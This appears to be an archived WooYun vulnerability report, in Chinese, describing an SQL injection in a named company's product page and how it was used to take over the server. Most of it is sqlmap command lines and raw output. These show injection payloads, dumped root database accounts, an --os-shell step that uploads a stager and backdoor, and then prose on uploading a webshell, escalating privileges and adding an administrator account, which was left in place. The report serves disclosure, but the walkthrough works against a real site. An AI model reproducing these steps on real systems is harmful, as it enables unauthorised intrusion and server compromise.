乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-30: 细节已通知厂商并且等待厂商处理中 2015-12-05: 厂商已经主动忽略漏洞,细节向公众公开
上次友情检测出,多处SQL注入漏洞,并且是root权限,竟然被忽略了,我也只能呵呵了!这次就讲讲攻陷服务器吧!
这次就以一处SQL注入为例吧
http://www.1218.com.cn/index.php/product?id=23
不扯其他的了,直接进主题!
首先看下权限:
sqlmap.py -u "http://www.1218.com.cn/index.php/product?id=23" --password sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net[*] starting at: 04:26:22[04:26:23] [INFO] using 'E:\Python27\sqlmap\output\www.1218.com.cn\session' as session file[04:26:23] [INFO] resuming injection data from session file[04:26:23] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file[04:26:23] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=23' AND 4645=4645 AND 'SUds'='SUds Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=23' AND SLEEP(5) AND 'xrKF'='xrKF---[04:26:23] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.9, PHP 5.5.12back-end DBMS: MySQL 5.0.11[04:26:23] [INFO] fetching database users password hashes[04:26:23] [INFO] fetching database users[04:26:23] [INFO] fetching number of database users[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 4[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 'root'@'localhost'[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 'root'@'127.0.0.1'[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 'root'@'::1'[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': ''@'localhost'[04:26:23] [INFO] fetching number of password hashes for user 'root'[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': 1[04:26:23] [INFO] fetching password hashes for user 'root'[04:26:23] [INFO] read from file 'E:\Python27\sqlmap\output\www.1218.com.cn\session': *-----------------直接root权限,密码用不着----------------------do you want to use dictionary attack on retrieved password hashes? [Y/n/q] ndatabase management system users password hashes:[*] root [1]: password hash:-----------------直接root权限,密码用不着----------------------[04:26:26] [INFO] Fetched data logged to text files under 'E:\Python27\sqlmap\output\www.1218.com.cn'[*] shutting down at: 04:26:26
来个最简单暴力的,不找上传点了,不然还得破解用户名、密码(麻烦);直接创造个上传点
sqlmap.py -u "http://www.1218.com.cn/index.php/product?id=23" --os-shell sqlmap/0.9 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net[*] starting at: 04:35:14[04:35:14] [INFO] using 'E:\Python27\sqlmap\output\www.1218.com.cn\session' as session file[04:35:14] [INFO] resuming injection data from session file[04:35:14] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file[04:35:14] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=23' AND 4645=4645 AND 'SUds'='SUds Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=23' AND SLEEP(5) AND 'xrKF'='xrKF---[04:35:15] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.9, PHP 5.5.12back-end DBMS: MySQL 5.0.11[04:35:15] [INFO] going to use a web backdoor for command prompt[04:35:15] [INFO] fingerprinting the back-end DBMS operating system[04:35:16] [INFO] the back-end DBMS operating system is Windows[04:35:16] [INFO] trying to upload the file stagerwhich web application language does the web server support?[1] ASP (default)[2] ASPX[3] PHP[4] JSP> 3[04:35:19] [WARNING] unable to retrieve the web server document rootplease provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: E:/wamp/www[04:35:23] [WARNING] unable to retrieve any web server pathplease provide any additional web server full path to try to upload the agent [Enter for None]:[04:35:25] [INFO] the file stager has been successfully uploaded on 'E:/wamp/www' ('http://www.1218.com.cn:80/tmpudvwl.php')[04:35:26] [INFO] the backdoor has probably been successfully uploaded on 'E:/wamp/www', go with your browser to 'http://www.1218.com.cn:80//tmpbcafg.php' and enjoy it![04:35:26] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTERos-shell>
上传点出现了
http://www.1218.com.cn/tmpudvwl.php
然后上传webshell
接下来提权,增加超级用户
好了,服务器到手了!就这样,希望能够引起贵公司的重视!PS:Webshell已删,上传点已删!新建的管理员账号,留个证据吧,请管理员自删!
(上次提交贵公司的漏洞被忽略,好伤心--)还是那句,安全的重要性,你们比我懂,我只是个小白!
危害等级:无影响厂商忽略
忽略时间:2015-12-05 11:14
漏洞Rank:4 (WooYun评价)
暂无